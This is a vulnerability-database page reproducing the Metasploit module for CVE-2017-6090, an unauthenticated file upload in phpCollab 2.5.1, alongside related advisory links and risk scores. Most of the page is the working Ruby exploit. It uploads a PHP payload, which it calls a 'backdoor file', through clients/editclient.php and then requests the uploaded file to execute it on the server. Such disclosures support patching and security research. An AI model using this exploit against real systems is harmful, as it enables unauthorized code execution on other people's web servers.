">
Lucene search
K

phpCollab 2.5.1 Unauthenticated File Upload

🗓️ 20 Dec 2017 13:36:58Reported by Nicolas SERRA <[email protected]>, Nick Marcoccio "1oopho1e" <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 34 Views

phpCollab 2.5.1 Unauthenticated File Upload vulnerability exploited through Metasploit modul

Related
Code
ReporterTitlePublishedViews
Family
0day.today
PhpCollab 2.5.1 Shell Upload Exploit
30 Sep 201700:00
zdt
0day.today
phpCollab 2.5.1 - Unauthenticated File Upload Exploit
11 Jan 201800:00
zdt
Circl
CVE-2017-6090
2 Oct 201700:00
circl
CNVD
PhpCollab Arbitrary Code Execution Vulnerability
21 May 201800:00
cnvd
CVE
CVE-2017-6090
2 Oct 201717:00
cve
Cvelist
CVE-2017-6090
2 Oct 201717:00
cvelist
Exploit DB
phpCollab 2.5.1 - Arbitrary File Upload
2 Oct 201700:00
exploitdb
Exploit DB
phpCollab 2.5.1 - File Upload (Metasploit)
11 Jan 201800:00
exploitdb
exploitpack
phpCollab 2.5.1 - Arbitrary File Upload
2 Oct 201700:00
exploitpack
Nuclei
PhpColl 2.5.1 Arbitrary File Upload
7 Jul 202603:01
nuclei
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'phpCollab 2.5.1 Unauthenticated File Upload',
      'Description'    => %q{
          This module exploits a file upload vulnerability in phpCollab 2.5.1
        which could be abused to allow unauthenticated users to execute arbitrary code
        under the context of the web server user.

        The exploit has been tested on Ubuntu 16.04.3 64-bit
      },
      'Author'         =>
        [
          'Nicolas SERRA <n.serra[at]sysdream.com>', # Vulnerability discovery
          'Nick Marcoccio "1oopho1e" <iremembermodems[at]gmail.com>', # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-6090' ],
          [ 'EDB', '42934' ],
          [ 'URL', 'http://www.phpcollab.com/' ],
          [ 'URL', 'https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Automatic', {}] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2017-09-29'
      ))

      register_options(
        [
          OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"])
        ])
  end

  def check
    url = normalize_uri(target_uri.path, "general/login.php?msg=logout")
    res = send_request_cgi(
        'method'  => 'GET',
        'uri'     =>  url
    )

    version = res.body.scan(/PhpCollab v([\d\.]+)/).flatten.first
    vprint_status("Found version: #{version}")

    unless version
      vprint_status('Unable to get the PhpCollab version.')
      return CheckCode::Unknown
    end

    if Rex::Version.new(version) >= Rex::Version.new('0')
      return CheckCode::Appears
    end

    CheckCode::Safe
  end

  def exploit
    filename = '1.' + rand_text_alpha(8 + rand(4)) + '.php'
    id = File.basename(filename,File.extname(filename))
    register_file_for_cleanup(filename)

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"")

    print_status("Uploading backdoor file: #{filename}")

    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, 'clients/editclient.php'),
      'vars_get' => {
        'id'     => id,
        'action' => 'update'
      },
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s
     })

    if res && res.code == 302
      print_good("Backdoor successfully created.")
    else
      fail_with(Failure::Unknown, "#{peer} - Error on uploading file")
    end

    print_status("Triggering the exploit...")
    send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, "logos_clients/" + filename)
     }, 5)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Feb 2021 16:47Current
9.1High risk
Vulners AI Score9.1
CVSS 26.5
CVSS 38.8
EPSS0.96068
34